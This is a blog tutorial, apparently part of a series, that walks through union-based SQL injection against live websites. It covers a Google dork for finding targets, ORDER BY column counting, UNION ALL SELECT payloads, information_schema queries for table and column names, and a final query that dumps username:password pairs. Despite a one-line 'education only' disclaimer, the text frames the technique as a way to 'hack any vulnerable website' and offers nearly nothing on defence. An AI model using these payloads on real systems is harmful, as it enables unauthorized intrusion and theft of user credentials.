Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8

SQL Injection flaw is quite easiest to exploit and protect too but only when you know how to do it. In continuation to our Injection attacks tutorial series, today we will learn about Union Exploitation Technique to exploit SQL Injection Vulnerability. Union exploitation technique is most common and easiest way to exploit SQL injection vulnerability to hack into websites and if you know how to do it then its same the other way around i.e. Protect SQL Injection vulnerability to be exploited by Union Exploitation technique. So lets learn about Union Exploitation Technique in detail with help of examples.

Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8.

Note: This article is for education purposes only. Any misuse may lead to harsh cyber law charges and even imprisonment.

But before that let me brief all of you about what is Union Operator? Union is an inbuilt keyword in almost all databases which is used to join a query. In SQL, we normally used Union operator to link another SQL query with original query. Hackers use this concept to exploit SQL Injection flaws to run their own SQL queries to retrieve information like usernames, passwords and other juicy information from victims databases.

Here’s a brief about procedure that we are going to learn to exploit SQL Injection using Union Exploitation Technique:

1. Find the Vulnerable website which is vulnerable to SQL Injection.

2. Find the Number of Columns in website using Order by clause.

3. Find most vulnerable columns which can be used to exploit SQL Injection Vulnerability using Union operator.

4. Test run to validate that column found is vulnerable by querying version information.

5. Use Information Schema to get Table Names

6. Use Information Schema to get Column Names

7. Use Information Schema to get Column values. For example: Username, passwords, customer information.

Oops…. That’s it all about Union Exploitation technique to exploit SQL injection vulnerability to own or hack any vulnerable website. Now lets learn in detail how to use union Exploitation technique to Exploit SQL Injection Vulnerability.Let’s learn the process in detail.Union Exploitation Technique to Exploit SQL Injection Vulnerability:

Step 1: Finding SQL injection vulnerable websites:

We have already learned this in our previous articles, if somebody missed here is brief:
Use Google to find Vulnerable website by searching for below query :

inurl:php?id=

There are several other dorks to find SQL injection vulnerable websites but above one is easiest and success rate almost 90-95%.

Now Google search will display some results. Open any one of them, say

www.example.com/shop.php?id=6

Now to check if its vulnerable to SQL Injection or not, just add ‘(single quote) at end of it i.e. query will become something like below:

www.example.com/shop.php?id=6′

Now if you get error something like below, then it means website is vulnerable to SQL Injection.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

or something like below:

Query failed: You have an error in your SQL syntax near ”6”’ at line 1

or any other error.

Step 2: Finding Exact Number Columns in Website

Once you know that website is vulnerable to SQL Injection, next step is to find exact number of columns in website database. Which you can know by running below query :

www.example.com/shop.php?id=6 ORDER BY <NUM>–

Now say website has 16 columns, which you don’t know then you can get it by using binary search approach. For example running below manner sequences:

www.example.com/shop.php?id=6 ORDER BY 10–

Result : Some page opens with data i.e. no error page.Then incrementing it by 10 i.e.

www.example.com/shop.php?id=6 ORDER BY 20–

and so on until you get below error message :

Unknown column ‘<NUM>’ in ‘order clause’

or any other custom message.Once you get the above error message, then it means you exceeded the exact column numbers so decrease it one by once until to error is gone. Last successful page means exact column count. Say you get 16 columns. Then last successful request executed must be :

www.example.com/shop.php?id=6 ORDER BY 16–

This steps will give exact number of columns in the database of website.

Step 3: Finding Vulnerable Columns using UNION ALL clause.

Once you know the exact number of columns in database then you can get list of all vulnerable columns  by running below query:

www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–

This will result in some page and on that page some numbers will be displayed. Those are actually vulnerable columns. Now say 2, 4 and 8 are displayed on page. This means column 2, column 4 and column 8 are most vulnerable columns which can be used to run your own SQL queries.If above query execution shows normal web page as it usually displays then it means query is failed. Then we used field exploitation technqiue by inserting ‘-‘ in ID value. So the query will become something like below:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–

Wow, now you have some numbers scattered over web page, which means vulnerable columns on website.

Step 4: Test run to validate vulnerable columns

Now we have list of all vulnerable columns, next step will be validating that we are correct.Easiest way to validate is executing version() command in vulnerable column, for example, say column 2 was vulnerable:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16–

Now in place of 2 on web page you will get the version number displayed. Check this for all vulnerable columns.

Step 5: Use information Schema to get Table Names

Now we know vulnerable columns of database, next step will be extracting table names from the database. This can be achieved by knowing concepts of Information schema.Learn more about information schema to extract table names here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html

Using information schema we can execute query as if we are administrators. So in order to extract table names we will run below query on column 2 (vulnerable column).

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()–

Above query will give you complete list of tables present in the database. You know which table you need to search for Username and passwords :D.Step 6: Use information schema to get Column namesUsing the same concept used in step 5, we will use information schema to extract column names too.Learn more about Information Schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html

Now to extract column names from database, below query will work like Bulls Eye:

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()–

The above query will result into extracting all column names.Step 7: Use Information Schema concept to get column values of required tableWell till now we have table names, column names. Only thing left is data from tables. Now say we got some table as USERS which has column names USERNAME and PASSWORD. In order to extract data from USERS table below query is sufficient :

www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS–

Above query will result into displaying usernames and passwords in below format username:password as 0x3a is hex value for ‘:’.That’s it guys, now you have username, password, table names, passwords. What else do you need.That’s all for today, we will continue to learn more about injection attacks in later tutorials.If you have any queries of doubts, feel free to ask.